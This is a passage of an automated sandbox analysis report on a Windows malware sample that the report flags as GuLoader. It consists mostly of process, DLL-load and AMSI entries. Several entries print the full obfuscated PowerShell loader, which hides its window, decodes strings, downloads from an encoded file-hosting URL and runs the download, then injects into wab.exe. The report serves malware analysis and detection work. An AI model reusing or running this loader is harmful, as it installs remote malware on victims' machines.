C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb{ source: powershell.exe, 00000006.00000002.2630903523.00000000084F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ws\Mion.pdb source: powershell.exe, 00000006.00000002.2630903523.00000000084F5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2617016962.000000000300F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2617016962.000000000300F000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000006.00000002.2632901106.0000000009FF9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2632762679.0000000008AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2621078427.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($spermiduct)$global:Kongebrev = [System.Text.Encoding]::ASCII.GetString($Foromtale)$global:Presbyophrenia=$Kongebrev.substring($Efteruddannelseskurser,$Beloebsfeltet)<#Thoughtfreeness
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Kdehus $Saurauia $Ubeskaarne), (Shriekery @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Afkastkonti = [AppDomain]::CurrentDomain.GetAssemblies()$global:G
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Solstiks)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Uddannnelser, $false).DefineType($Sailable, $Fis
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($spermiduct)$global:Kongebrev = [System.Text.Encoding]::ASCII.GetString($Foromtale)$global:Presbyophrenia=$Kongebrev.substring($Efteruddannelseskurser,$Beloebsfeltet)<#Thoughtfreeness
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLaniti
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta 